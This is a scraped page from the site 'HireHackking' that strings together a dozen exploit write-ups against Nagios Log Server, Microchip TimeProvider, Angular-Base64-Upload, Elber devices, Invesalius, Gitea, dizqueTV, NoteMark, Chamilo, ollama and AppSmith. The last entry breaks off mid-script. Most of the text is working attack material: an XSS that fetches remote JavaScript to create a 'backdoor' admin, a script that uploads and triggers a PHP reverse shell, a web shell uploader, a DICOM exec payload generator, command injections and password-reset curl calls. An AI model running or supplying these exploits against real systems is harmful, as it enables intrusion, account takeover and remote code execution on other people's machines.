# Exploit Title: Stored XSS Vulnerability in Nagios Log Server (Privilege Escalation to Admin) # Date: 2025-04-02 # Exploit Author: Seth Kraft # Vendor Homepage: https://www.nagios.com/ # Vendor Changelog: https://www.nagios.com/changelog/#log-server # Software Link: https://www.nagios.com/products/log-server/download/ # Version: 2024R1.3.1 and below # Tested On: Nagios Log Server 2024R1.3.1 (default configuration, Ubuntu 20.04) # CWE: CWE-79, CWE-352, CWE-285, CWE-269, CWE-602 # CVSS: 9.3 (CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:R/S:C/VC:H/VI:H/VA:H) # Type: Stored Cross-Site Scripting (XSS), Privilege Escalation # Exploit Risk: Critical # Disclosure For research and authorized testing only. Do not use against systems without permission. # Description: A stored XSS vulnerability in Nagios Log Server 2024R1.3.1 allows a low-privileged user to inject malicious JavaScript into the 'email' field of their profile. When an administrator views the audit logs, the script executes, resulting in privilege escalation via unauthorized admin account creation. The vulnerability can be chained to achieve remote code execution (RCE) in certain configurations. # PoC 1. Log in as a standard (non-admin) user. 2. Navigate to the profile update endpoint: http://<target-ip>/nagioslogserver/profile/update 3. Inject the following payload into the email field: ```javascript <script> fetch("https://<EXTERNAL-HOST>/xss.js") .then(response => response.text()) .then(scriptText => eval(scriptText)) .catch(console.error); </script> ``` 4. Host the xss.js payload on your external server with the following content: ```javascript (function() { var csrfTokenMatch = document.cookie.match(/csrf_ls=([^;]+)/); if (!csrfTokenMatch) return; var csrfToken = encodeURIComponent(csrfTokenMatch[1]); var requestBody = "csrf_ls=" + csrfToken + "&name=backdoor" + "&email=hacker@example.com" + "&username=backdoor" + "&password=Password123!" + "&password2=Password123!" + "&auth_type=admin" + "&apiaccess=1" + "&language=en_US" + "&account_type=local"; fetch("http://<target-ip>/nagioslogserver/admin/users/create", { method: "POST", headers: { "Content-Type": "application/x-www-form-urlencoded" }, body: requestBody }) .then(response => response.text()) .then(console.log) .catch(console.error); })(); ``` 5. Wait for an administrator to view the audit logs. The JavaScript will execute, creating a new admin account: Username: backdoor Password: Password123!
HireHackking
# Exploit Title: Microchip TimeProvider 4100 (Configuration modules) 2.4.6 - OS Command Injection # Exploit Author: Armando Huesca Prida # Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli # Date of Disclosure: 27/06/2024 # Date of CVE Publication: 4/10/2024 # Exploit Publication: 10/10/2024 # Vendor Homepage: https://www.microchip.com/ # Version: Firmware release 1.0 through 2.4.7 # Tested on: Firmware release 2.3.12 # CVE: CVE-2024-9054 # External References: # URL: https://www.cve.org/cverecord?id=CVE-2024-9054 # URL: https://0xhuesca.com/2024/10/cve-2024-9054.html # URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-rce-through-configuration-file # URL: https://www.gruppotim.it/it/footer/red-team.html # Vulnerability Description: A Remote Code Execution (RCE) vulnerability exists in the "secret_key" XML tag in the Microchip TimeProvider 4100 device's configuration file. Once the configuration file containing the malicious payload is loaded by the device, after first attempt of login the payload will execute resulting in remote code execution. # Exploitation Steps: 1- Perform login into the device's management web interface. 2- Download the device's configuration file. 3- Substitute the "secret_key" value with the malicious payload. 4- Save the new configuration file containing the OS command to be executed. 5- Restore and submit the new configuration. 6- Attempt of login using any active service like SSH/Telnet/Console will trigger the malicious payload. # Example of malicious XML config file: <?xml version="1.0"?> [...] <security> [...] <server> <ip>192.168.1.1</ip> <secret_key>`ping 192.168.1.20`</secret_key> [...] </server> [...] </security> [...] # Proof of Concept - PoC: Manually modifying the following request it's possible to obtain interactive shell on the vulnerable device. Below is provided the list of values to be updated on the Exploit - HTTP request: - [session cookie] - [XML configuration file containing the injection on "secret_key" tag] - [Web account password in clear-text] - [device IP] # Exploit - Restore and submit config file HTTP Request: POST /config_restore HTTP/1.1 Host: [device IP] Cookie: ci_session=[session cookie] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------182708909322642582691204887002 Content-Length: 206640 Origin: https://[device IP] Referer: https://[device IP]/configbackuprestore Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: keep-alive -----------------------------182708909322642582691204887002 Content-Disposition: form-data; name="file"; filename="tp4100_cfg.txt" Content-Type: text/plain [XML configuration file containing the injection on "secret_key" tag] -----------------------------182708909322642582691204887002 Content-Disposition: form-data; name="pword" [Web account password in clear-text] -----------------------------182708909322642582691204887002-- # End
HireHackking
# Exploit Title: Angular-Base64-Upload Library 0.1.20 - Remote Code Execution (RCE) # Date: 10 October 2024 # Discovered by : Ravindu Wickramasinghe | rvz (@rvizx9) # Exploit Author: Ravindu Wickramasinghe | rvz (@rvizx9) # Vendor Homepage: https://www.npmjs.com/package/angular-base64-upload # Software Link: https://github.com/adonespitogo/angular-base64-upload # Version: prior to v0.1.21 # Tested on: Arch Linux # CVE : CVE-2024-42640 # Severity: Critical - 10.0 (CVSS 4.0) # Github Link : https://github.com/rvizx/CVE-2024-42640 # Blog Post : https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html # DISCLAIMER: # This proof-of-concept (POC) exploit is provided strictly for educational and research purposes. # It is designed to demonstrate potential vulnerabilities and assist in testing the security posture of software systems. # The author expressly disclaims any responsibility for the misuse of this code for malicious purposes or illegal activities. # Any actions taken with this code are undertaken at the sole discretion and risk of the user. # The author does not condone, encourage, or support any unauthorized access, intrusion, or disruption of computer systems. # Use of this POC exploit in any unauthorized or unethical manner is strictly prohibited. # By using this code, you agree to assume all responsibility and liability for your actions. # Furthermore, the author shall not be held liable for any damages or legal repercussions resulting from the use or misuse of this code. # It is your responsibility to ensure compliance with all applicable laws and regulations governing your use of this software. # Proceed with caution and use this code responsibly. #!/bin/python3 import re import subprocess import requests import sys import os import uuid import base64 def banner(): print(''' \033[2mCVE-2024-42640\033[0m - Unauthenticated RCE via Anuglar-Base64-Upload Library \033[2m PoC Exploit \033[0mRavindu Wickramasinghe\033[2m | rvz (ラヴィズ) - twitter: @rvizx9 https://github.com/rvizx/\033[0mCVE-2024-42640 ''') def enum(url): print("\033[94m[inf]:\033[0m enumerating for dependency installtion directories... ") target = f"{url}/bower_components/angular-base64-upload/demo/index.html" r = requests.head(target) if r.status_code == 200: print("\033[94m[inf]:\033[0m target is using bower_components") else: print("\033[94m[inf]:\033[0m target is not using bower_components") target = f"{url}/node_modules/angular-base64-upload/demo/index.html" r = requests.head(target) if r.status_code == 200: print("\033[94m[inf]:\033[0m target is using node_modules") else: print("\033[94m[inf]:\033[0m target is not using node_modules") print("\033[91m[err]:\033[0m an error occured, it was not possible to enumerate for angular-base64-upload/demo/index.html") print("\033[93m[ins]:\033[0m please make sure you've defined the target to the endpoint prior to the depdency installation directory") print("\033[93m[ins]:\033[0m for manual exploitation, please refer to this: https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html") print("\033[91m[err]:\033[0m exiting..") exit() version = next((line for line in requests.get(target.replace("demo/index.html","CHANGELOG.md")).text.splitlines() if 'v0' in line), None) print("\033[94m[inf]:\033[0m angular-base64-upload version: ",version) exploit(target) def exploit(target): print(f"[dbg]: {target}") target_server_url = target.replace("index.html","server.php") print(f"[dbg]: {target_server_url}") payload_url = "https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php" print("\033[94m[inf]:\033[0m generating a php reverse shell to upload..") ip = input("\033[93m[ins]:\033[0m enter listener ip / domain: ") port = input("\033[93m[ins]:\033[0m enter listenter port: ") print(f"\033[93m[ins]:\033[0m start a listener, execute nc -lvnp {port}") input("\033[93m[ins]:\033[0m press enter to continue...") print("\033[94m[inf]:\033[0m downloading php-reverse-shell from github/pentestmonkey...") response = requests.get(payload_url) if response.status_code == 200: php_code = response.text.replace("127.0.0.1", ip).replace("1234", port) # replacing default values with user input payload_name = str(uuid.uuid4())+".php" # using a uuid for payload name with open(payload_name, "w") as file: file.write(php_code) else: print("\033[91m[err]:\033[0m failed to fetch the php-reverse-shell.") print("\033[91m[err]:\033[0m exiting..") exit() with open(payload_name, 'rb') as file: file_content = file.read() base64_payload = base64.b64encode(file_content).decode('utf-8') headers = { 'Content-Type': 'application/json', } json_data = { 'base64': base64_payload, 'filename': payload_name, } response = requests.post(target_server_url, headers=headers, json=json_data, verify=False) print("\033[94m[inf]:\033[0m file upload request sent! [status-code]: ",response.status_code) updemo_endpoint = f"uploads/{payload_name}" print(f"[dbg]: {updemo_endpoint}") payload_url = target_server_url.replace("server.php",updemo_endpoint) print(f"[dbg]: {payload_url}") if response.status_code == 200: print(f"\033[94m[inf]:\033[0m reverse-shell is uploaded to {payload_url}") print("\033[94m[inf]:\033[0m executing the uploaded reverse-shell..") r = requests.get(payload_url) if r.status_code == 200: print("\033[94m[inf]:\033[0m process complete!") else: print("\033[91m[err]:\033[0m something went wrong!") print("\033[93m[ins]:\033[0m please check the listener for incoming connections.") if __name__ == "__main__": try: banner() url = sys.argv[1] print(f"\033[94m[inf]:\033[0m target: {url}") enum(url) except: print("[usg]: ./exploit.py <target-url>") exit()
HireHackking
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.5.179 Revision 904 1.5.56 Revision 884 1.229 Revision 440 Summary: ESE (Elber Satellite Equipment) product line, designed for the high-end radio contribution and distribution market, where quality and reliability are most important. The Elber IRD (Integrated Receiver Decoder) ESE-01 offers a professional audio quality (and composite video) at an excellent quality/price ratio. The development of digital satellite contribution networks and the need to connect a large number of sites require a cheap but reliable and performing satellite receiver with integrated decoder. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5820 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)
HireHackking
Elber Wayber Analog/Digital Audio STL 4.00 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: Version 3.0.0 Revision 1553 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1542 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1516) Version 3.0.0 Revision 1530 (Firmware Ver. 4.00 Rev. 1501) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1350) Version 3.0.0 Revision 1480 (Firmware Ver. 3.00 Rev. 1342) Version 1.0.0 Revision 1202 (Firmware Ver. 2.00 Rev. 2131) Summary: Wayber II is the name of an analogue/digital microwave link able to transport a Mono or a MPX stereo signal from studio to audio transmitter. Compact and reliable, it features very high quality and modern technology both in signal processing and microwave section leading to outstanding performances. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5823 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5823.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.
HireHackking

Invesalius3 - Remote Code Execution

HACKER · %s · %s

# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE) # Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave) # Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti #(partywave) # Date: 23/08/2024 # Vendor Homepage: https://invesalius.github.io/ # Software Link: #https://github.com/invesalius/invesalius3/tree/master/invesalius # Version: 3.1.99991 to 3.1.99998 # Tested on: Windows # CVE: CVE-2024-42845 # External References: #https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845, #https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845, #https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan # Description: #---------------- # #A Remote Code Execution (RCE) vulnerability exists in the DICOM file import #procedure in Invesalius3. This vulnerability afflicts all versions from #3.1.99991 to 3.1.99998. The exploitation steps of this vulnerability #involve the use of a crafted DICOM file which, once imported inside the #victim's client application allows an attacker to gain remote code #execution over the victim's machine. # Script: #---------------- # ### # The script below creates a specifically crafted DICOM payload for #CVE-2024-42845. Remote Code Execution is gained once the DICOM file is #imported inside the victim's client application. ### import pydicom import base64 import argparse pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE def encode_payload(plain_payload): data = open(plain_payload, 'rb').read() return f"exec(__import__('base64').b64decode({base64.b64encode(data)})" def prepare_dicom_payload(dicom_file_path, payload): try: dicom_data = pydicom.dcmread(dicom_file_path) values = dicom_data[0x0020, 0x0032].value mal = [str(i) for i in values] mal.append(encode_payload(payload)) except pydicom.errors.InvalidDicomError: print("The file is not a valid DICOM file.") except Exception as e: print(f"An error occurred: {e}") return mal def modify_dicom_field(dicom_file_path, malicious_tag, outfile, sign): try: dicom_dataset = pydicom.dcmread(dicom_file_path) if sign: dicom_dataset.Manufacturer = "Malicious DICOM file creator" dicom_dataset.InstitutionName = "Malicious DICOM file institution" elem = pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag) dicom_dataset[0x00200032] = elem print(dicom_dataset) dicom_dataset.save_as(outfile) except Exception as e: print(f"An error occurred: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='Read a DICOM file.') parser.add_argument('--dicom', required=True, help='Path to the input DICOM file') parser.add_argument('--outfile', required=True, help='Path to the output DICOM file') parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code') parser.add_argument('--signature', required=False, default=True) args = parser.parse_args() dicom_infile_path = args.dicom dicom_outfile_path = args.outfile print(args.signature) tmp_tag = prepare_dicom_payload(dicom_infile_path, payload=args.payload) if tmp_tag: malicious_tag = '\\'.join(tmp_tag) modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path, sign=args.signature) exit(0) else: exit(1)
HireHackking

Gitea 1.22.0 - Stored XSS

HACKER · %s · %s

# Exploit Title: Stored XSS in Gitea # Date: 27/08/2024 # Exploit Authors: Catalin Iovita & Alexandru Postolache # Vendor Homepage: (https://github.com/go-gitea/gitea) # Version: 1.22.0 # Tested on: Linux 5.15.0-107, Go 1.23.0 # CVE: CVE-2024-6886 ## Vulnerability Description Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session. ## Steps to Reproduce 1. Log in to the application. 2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint. 3. In the Description field, input the following payload: <a href=javascript:alert()>XSS test</a> 4. Save the changes. 5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.
HireHackking

dizqueTV 1.5.3 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd
HireHackking

NoteMark < 0.13.0 - Stored XSS

HACKER · %s · %s

# Exploit Title: Stored XSS in NoteMark # Date: 07/29/2024 # Exploit Author: Alessio Romano (sfoffo) # Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/ # Version: 0.13.0 and below # Tested on: Linux # References: https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819, https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182, https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3 # CVE: CVE-2024-41819 ## Steps to Reproduce 1. Log in to the application. 2. Create a new note or enter a previously created note. 3. Access the note editor functionality from the selected note by clicking on the "Editor" tab. 4. Input the following payload: [xss-link](javascript:alert(1)) 5. Save the changes. 6. Click on the "Rendered" tab to view the rendered markdown version of the note. Click on the previously created link to pop the injected alert. ## HTTP Request PoC PUT /api/notes/<note-uuid>/content HTTP/1.1 Host: localhost:8000 Accept: */* Content-Type: text/plain;charset=UTF-8 Content-Length: 34 Sec-Fetch-Site: same-origin Authorization: Bearer <TOKEN> [xss-link](javascript:alert(1))
HireHackking

Chamilo LMS 1.11.24 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: Chamilo LMS 1.11.24 - Remote Code Execution (RCE) # Exploit Author: 0x00-null - Mohamed Kamel BOUZEKRIA # Exploit Date: September 3, 2024 # Vendor Homepage: https://chamilo.org/ # Software Link: https://chamilo.org/ # Version: 1.11.24 (Beersel) # Tested Versions: 1.11.24 (Beersel) - August 31, 2023 # CVE ID: CVE-2023-4220 # Vulnerability Type: Remote Code Execution # Description: Unauthenticated remote code execution in Chamilo LMS <= 1.11.24 due to an unrestricted file upload vulnerability. # Proof of Concept: Yes # Categories: Web Application, Remote Code Execution, File Upload # CVSS Score: 8.1 (High) # CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H # Notes: Ensure that the /main/inc/lib/javascript/bigupload/files/ directory exists and is writable. # License: MIT License # References: # - CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4220 # - Exploit Documentation: https://github.com/0x00-null/Chamilo-CVE-2023-4220-RCE-Exploit # - Vendor Advisory: https://chamilo.org/ import requests import argparse from urllib.parse import urljoin def upload_shell(target_url, payload_name): upload_url = urljoin(target_url, "main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported") shell_path = f"/main/inc/lib/javascript/bigupload/files/{payload_name}" shell_url = urljoin(target_url, shell_path) # Payload containing the PHP web shell files = {'bigUploadFile': (payload_name, '<?php system($_GET["cmd"]); ?>', 'application/x-php')} # Upload the payload response = requests.post(upload_url, files=files) if response.status_code == 200: print("[+] File uploaded successfully!") print(f"[+] Access the shell at: {shell_url}?cmd=") else: print("[-] File upload failed.") def execute_command(shell_url, cmd): # Execute the command response = requests.get(f"{shell_url}?cmd={cmd}") if response.status_code == 200: print(f"[+] Command Output:\n{response.text}") else: print(f"[-] Failed to execute command at {shell_url}") if __name__ == "__main__": # Parse command-line arguments parser = argparse.ArgumentParser(description="CVE-2023-4220 Chamilo LMS Unauthenticated File Upload RCE Exploit") parser.add_argument('target_url', help="The target base URL of the Chamilo LMS instance (e.g., http://example.com/)") parser.add_argument('cmd', help="The command to execute on the remote server") parser.add_argument('--shell', default='rce.php', help="The name of the shell file to be uploaded (default: rce.php)") args = parser.parse_args() # Run the exploit with the provided arguments upload_shell(args.target_url, args.shell) # Form the shell URL to execute commands shell_url = urljoin(args.target_url, f"main/inc/lib/javascript/bigupload/files/{args.shell}") execute_command(shell_url, args.cmd)
HireHackking
# Exploit Title: Microchip TimeProvider 4100 Grandmaster (Banner Config Modules) 2.4.6 - Stored Cross-Site Scripting (XSS) # Exploit Author: Armando Huesca Prida # Discovered By: Armando Huesca Prida, Marco Negro, Antonio Carriero, Vito Pistillo, Davide Renna, Manuel Leone, Massimiliano Brolli # Date of Disclosure: 27/06/2024 # Date of CVE Publication: 4/10/2024 # Exploit Publication: 10/10/2024 # Vendor Homepage: https://www.microchip.com/ # Version: Firmware release 1.0 through 2.4.7 # Tested on: Firmware release 2.3.12 # CVE: CVE-2024-43687 # External References: # URL: https://www.cve.org/cverecord?id=CVE-2024-43687 # URL: https://www.0xhuesca.com/2024/10/cve-2024-43687.html # URL: https://www.microchip.com/en-us/solutions/technologies/embedded-security/how-to-report-potential-product-security-vulnerabilities/timeprovider-4100-grandmaster-stored-xss-vulnerability-in-banner # URL: https://www.gruppotim.it/it/footer/red-team.html # Vulnerability Description: The TimeProvider 4100 grandmaster firmware has a stored Cross-Site Scripting (XSS) vulnerability in the custom banner configuration field. A threat actor that exploits this vulnerability is able to execute arbitrary scripts in any user context. # Exploitation Steps: 1- Log in to the device's web management interface. 2- Open the banner configuration panel. 3- Select the "custom banner" feature. 4- Insert the malicious JavaScript payload. 5- Apply and save the system configuration containing the custom banner. 6- Victims who connect to the device's web management interface will execute the malicious payload in their browser. # Example of malicious JavaScript payload: <img src=a onerror=alert(1)> # Proof of Concept - PoC: By manually modifying the following request, it is possible to create a new custom device banner containing a malicious JavaScript payload, resulting in a stored XSS vulnerability. The list of values that must be updated in the exploit HTTP request is given below: - [session cookie] - [malicious JavaScript payload] - [device IP] # Exploit - HTTP Request: POST /bannerconfig HTTP/1.1 Host: [device IP] Cookie: ci_session=[session cookie] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------9680247575877256312575038502 Content-Length: 673 Origin: https://[device IP] Referer: https://[device IP]/bannerconfig Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: keep-alive -----------------------------9680247575877256312575038502 Content-Disposition: form-data; name="user_level" 1 -----------------------------9680247575877256312575038502 Content-Disposition: form-data; name="bannerradio" CUSTOMIZED -----------------------------9680247575877256312575038502 Content-Disposition: form-data; name="txtcustom" [malicious JavaScript payload] -----------------------------9680247575877256312575038502 Content-Disposition: form-data; name="action" applybanner -----------------------------9680247575877256312575038502-- # End
HireHackking

ollama 0.6.4 - Server Side Request Forgery (SSRF)

HACKER · %s · %s

# Exploit Title: ollama 0.6.4 - SSRF # Date: 2025-04-03 # Exploit Author: sud0 # Vendor Homepage: https://ollama.com/ # Software Link: https://github.com/ollama/ollama/releases # Version: <=0.6.4 # Tested on: CentOS 8 import argparse import requests import json from urllib.parse import urljoin def check_port(api_base, ip, port): api_endpoint = api_base.rstrip('/') + '/api/create' model_path = "mynp/model:1.1" target_url = f"https://{ip}:{port}/{model_path}" payload = { "model": "mario", "from": target_url, "system": "You are Mario from Super Mario Bros." } try: response = requests.post(api_endpoint, json=payload, timeout=10, stream=True) response.raise_for_status() for line in response.iter_lines(): if line: try: json_data = json.loads(line.decode('utf-8')) if "error" in json_data and "pull model manifest" in json_data["error"]: error_msg = json_data["error"] model_path_list = model_path.split(":", 2) model_path_prefix = model_path_list[0] model_path_suffix = model_path_list[1] model_path_with_manifests = f"{model_path_prefix}/manifests/{model_path_suffix}" if model_path_with_manifests in error_msg: path_start = error_msg.find(model_path_with_manifests) result = error_msg[path_start+len(model_path_with_manifests)+3:] if path_start != -1 else "" print(f"Raw Response: {result}") if "connection refused" in error_msg.lower(): print(f"[!] Port Closed - {ip}:{port}") else: print(f"[+] Port Maybe Open - {ip}:{port}") return except json.JSONDecodeError: continue print(f"[?] Unkown Status - {ip}:{port}") except requests.exceptions.RequestException as e: print(f"[x] Execute failed: {str(e)}") if __name__ == "__main__": parser = argparse.ArgumentParser(description="ollama ssrf - port scan") parser.add_argument("--api", required=True, help="Ollama api url") parser.add_argument("-i", "--ip", required=True, help="target ip") parser.add_argument("-p", "--port", required=True, type=int, help="target port") args = parser.parse_args() check_port(args.api, args.ip, args.port)
HireHackking

AppSmith 1.47 - Remote Code Execution (RCE)

HACKER · %s · %s

# Exploit Title: AppSmith 1.47 - Remote Code Execution (RCE) # Original Author: Rhino Security Labs # Exploit Author: Nishanth Anand # Exploit Date: April 2, 2025 # Vendor Homepage: https://www.appsmith.com/ # Software Link: https://github.com/appsmithorg/appsmith # Version: Prior to v1.52 # Tested Versions: v1.47 # CVE ID: CVE-2024-55963 # Vulnerability Type: Remote Code Execution # Description: Unauthenticated remote code execution in Appsmith versions prior to v1.52 due to misconfigured PostgreSQL database allowing COPY FROM PROGRAM command execution. # Proof of Concept: Yes # Categories: Web Application, Remote Code Execution, Database # CVSS Score: 9.8 (Critical) # CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H # Notes: The vulnerability exists in Appsmith's internal PostgreSQL database configuration, allowing attackers to execute arbitrary commands on the host system. import requests import json import pyfiglet import argparse # Create a banner using pyfiglet banner = pyfiglet.figlet_format("Appsmith RCE") # Replace with your desired title print(banner) # Set up argument parser parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept') parser.add_argument('-u', '--url', required=True, help='Base URL of the target') parser.add_argument('command', nargs='?', default='id', help='Command to execute') args = parser.parse_args() # Get the base URL and command from the parsed arguments base_url = args.url command_arg = args.command if not base_url.startswith("http://") and not base_url.startswith("https://"): base_url = "http://" + base_url # Signup request signup_url = f"{base_url}/api/v1/users" signup_data = { "email": "poc1@poc.com", "password": "Testing123!" } print('Signing up...') signup_response = requests.post(signup_url, data=signup_data) signup_response.raise_for_status() # Login request login_url = f"{base_url}/api/v1/login" # Adjust the URL as needed login_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/user/login", "Cookie": "ajs_user_id=e471142002a6163a3beff6ee71606ea55d631c49e566f403b0614af905ae951d; intercom-device-id-y10e7138=83f9c6a5-3c0b-409e-9d7b-9ca61a129f49; SESSION=1e786474-3b33-407d-be71-47d986031a24; ajs_anonymous_id=8e91142e-ea5a-4725-91b6-439e8bd0abc1; intercom-session-y10e7138=bHI4SnhSRFhmUUVLUXpGZ0V0R0lzUkZsSmxEQkFJKzRaV20wMGtnaGtJWjJoc1AySWV6Rnl2c1AvbUY4eEkxaC0tK1pqNHNKYlZxVzBib1F3NVhXK0poQT09--0daa2198fe17122d3291b90abdb3e78d193ad2ed", } login_data = { "username": "poc1@poc.com", # Adjusted to match the provided request "password": "Testing123!" } # Make the login request without following redirects print('Logging in...') login_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False) login_response.raise_for_status() # Capture the 'Set-Cookie' header if it exists set_cookie = login_response.headers.get('Set-Cookie') if set_cookie: # Split the Set-Cookie header to get the cookie name and value cookie_name, cookie_value = set_cookie.split(';')[0].split('=') # Fourth request to create a new workspace print('Creating a new workspace...') if set_cookie: fourth_request_url = f"{base_url}/api/v1/workspaces" fourth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", 